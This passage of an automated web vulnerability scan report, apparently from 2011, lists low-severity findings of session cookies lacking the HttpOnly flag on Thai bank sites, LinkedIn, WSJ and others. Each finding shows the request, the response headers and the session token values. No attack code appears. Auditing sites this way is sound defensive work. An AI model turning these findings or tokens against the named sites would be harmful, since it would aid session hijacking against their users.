Set-Cookie: ASPSESSIONIDQSSRQSAA=HOGFIDBANCMFFJIPOCIGMBLH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

16.21. http://moneytalk.scb.co.th/index.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.asp HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:24:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29865
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=EEOJLEJDEGJCLJGFIDLKGIDM; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

16.22. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ib/login_en.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /K-Online/ib/login_en.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:04 GMT
Set-Cookie: JSESSIONID=0001wQXXNsIyMCMHC2wjXxvowKZ:1DLJUVVU3R; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 43843

...


<html>
<head>
<title>Welcome to K-Cyber Banking</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta http-equi
...[SNIP]...

16.23. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ksec/K-CyberTrade-login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /K-Online/ksec/K-CyberTrade-login.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-Length: 10641
Set-Cookie: JSESSIONID=0001EidkyFV5kaz-4tiOC5P_auE:-1JC3VU2; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


   <script>
       if(location.href.indexOf("kgateway")>=0){
           window.location.href="https://online.kasikornbankgroup.com
...[SNIP]...

16.24. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/BT-CO-20110428-705019.html/x22 HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa0f634f-2160-4807-9b6f-dd9894b18d38; domain=.wsj.com; path=/; Expires=Fri Apr 30 09:24:28 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Wed, 02-May-2012 13:24:28 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 05/02/11 - 00:46:42 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=36
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 82539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

16.25. http://plugins.jquery.com/node/1208]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://plugins.jquery.com
Path:   /node/1208]

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/1208] HTTP/1.1
Host: plugins.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=uefg9t2vtgr3m4hsfu00e0rl63; expires=Thu, 26 May 2011 16:58:08 GMT; path=/; domain=.plugins.jquery.com
Last-Modified: Tue, 03 May 2011 13:22:27 GMT
ETag: "bb270c5333bea4291206cb78b1e0ddd3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

16.26. http://plugins.jquery.com/project/onImagesLoad  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://plugins.jquery.com
Path:   /project/onImagesLoad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /project/onImagesLoad HTTP/1.1
Host: plugins.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:24:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=4v2ff4ihc2flhm71q85935t014; expires=Thu, 26 May 2011 16:58:09 GMT; path=/; domain=.plugins.jquery.com
Last-Modified: Tue, 03 May 2011 13:22:28 GMT
ETag: "8fdfdd319be915413bb3b568e92757a1"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

16.27. http://register2.set.or.th/semreg/detail.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /semreg/detail.aspx HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:32:58 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=xq1ifbuenuff1juvhqtkga45; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5867


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

16.28. http://scb.dev-orisma.com/en/friends-of-scb  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://scb.dev-orisma.com
Path:   /en/friends-of-scb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/friends-of-scb HTTP/1.1
Host: scb.dev-orisma.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:42 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=e9j9ca67fduk5kqm5c2h6ue0s4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13460

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>Friends of SCB | The Siam Commercial Bank</title>

<link rel="shortcut icon" href="favicon.ico" type="image/x
...[SNIP]...

16.29. http://seal.controlcase.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://seal.controlcase.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 10:18:58 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=8b0ca23c737d01f1863d3708dd5d306b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.controlcase.com/
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1


16.30. http://th.linkedin.com/in/narongchai  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://th.linkedin.com
Path:   /in/narongchai

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /in/narongchai HTTP/1.1
Host: th.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0914326324168300109"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:UvLCachlIU-Sw1chSdL-OsHxAUVtCbInth04RtWljKGt6M_FfhDx0w:1304429233:128b7631ce6fae821c3883417c1efbc688b51624"; Version=1; Max-Age=1799; Expires=Tue, 03-May-2011 13:57:12 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Sun, 21-May-2079 16:41:20 GMT; Path=/
Set-Cookie: bcookie="v=1&0e90019a-e852-4952-934f-d122b3a07be8"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 21-May-2079 16:41:20 GMT; Path=/
Last-Modified: Mon, 25 Apr 2011 08:41:54 GMT
Set-Cookie: bcookie=0bbc3d87-a199-4a56-a702-02cda34c0373; Domain=linkedin.com; Expires=Sun, 21-May-2079 16:41:21 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 03 May 2011 13:27:14 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta name="descr
...[SNIP]...

16.31. http://trends.atipat.co.cc/thailand-breast-slap/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thailand-breast-slap/x22 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:27:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1280c352f0a6df747643c1f2abd26d8e; path=/
Last-Modified: Tue, 03 May 2011 13:27:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...

16.32. http://weblink.settrade.com/banner/banner3.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://weblink.settrade.com
Path:   /banner/banner3.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /banner/banner3.jsp HTTP/1.1
Host: weblink.settrade.com
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:20 GMT
Set-Cookie: JSESSIONID=BDD4179830077099A80BF737DD7FE5F0.tcipo2; Path=/
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 17779


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0042)http://www.settrade.com/banner/banner3.jsp -->
<HTML><HEAD><TIT
...[SNIP]...

16.33. http://wikipediareview.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wikipediareview.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?showtopic\\x3d32014\\x22 HTTP/1.1
Host: wikipediareview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: 0session_id=11c93e765b7f96723766ab11a49d89be; path=/; domain=.wikipediareview.com
Connection: close
Content-Type: text/html
Content-Length: 68471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...

16.34. http://www.360travelguide.com/results.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.360travelguide.com
Path:   /results.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results.asp HTTP/1.1
Host: www.360travelguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 May 2011 13:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.360travelguide.com/
Content-Length: 26243
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDCCARR=GAOGAIKDCKOEGMKGKMCIFMLI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<met
...[SNIP]...

16.35. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=FDNLAAIDBMPJDMNNDFGEJGBA; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:50 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 6189

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<!--<link href="/_layouts/NR/BangkokBankWebApps/Email Registration/EMAIL.CSS" rel="styleshee
...[SNIP]...

16.36. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/Bangkok%20Bank/Pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid7180=D4196A67.1; visit_time=1591

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 443
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=IIEABAIDGABJELAJPNADHDBG; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:53:04 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-En';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>
<a target="_blank" href="
...[SNIP]...

16.37. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 443
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTTCQT=PFGICGIDJBLAOOFHIKHEOBNN; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:51 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-En';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>
<a target="_blank" href="
...[SNIP]...

16.38. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/AccountAccess/account.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_layouts/nr/AccountAccess/account.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=DDNLAAIDMNEFBOEJKJKJCIBB; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:50 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 5391

<html>
<head>
<title>Account Access</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
<!--
body {
   margin-left: 0px;
   margin-top: 0px;

...[SNIP]...

16.39. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=EDNLAAIDGGPICGJABGIJMIHA; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:50 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 2241

<html>
<head>
<title>Loan Rates English</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/_layouts/nr/BangkokBank/style/BBL.CSS" rel="stylesheet" type=
...[SNIP]...

16.40. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/Bangkok%20Bank/Pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid7180=D4196A67.1; visit_time=1591

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTTCQT=GHPMCGIDFMIJBHPDOCIGGBDN; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:53:05 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 2241

<html>
<head>
<title>Loan Rates English</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/_layouts/nr/BangkokBank/style/BBL.CSS" rel="stylesheet" type=
...[SNIP]...

16.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

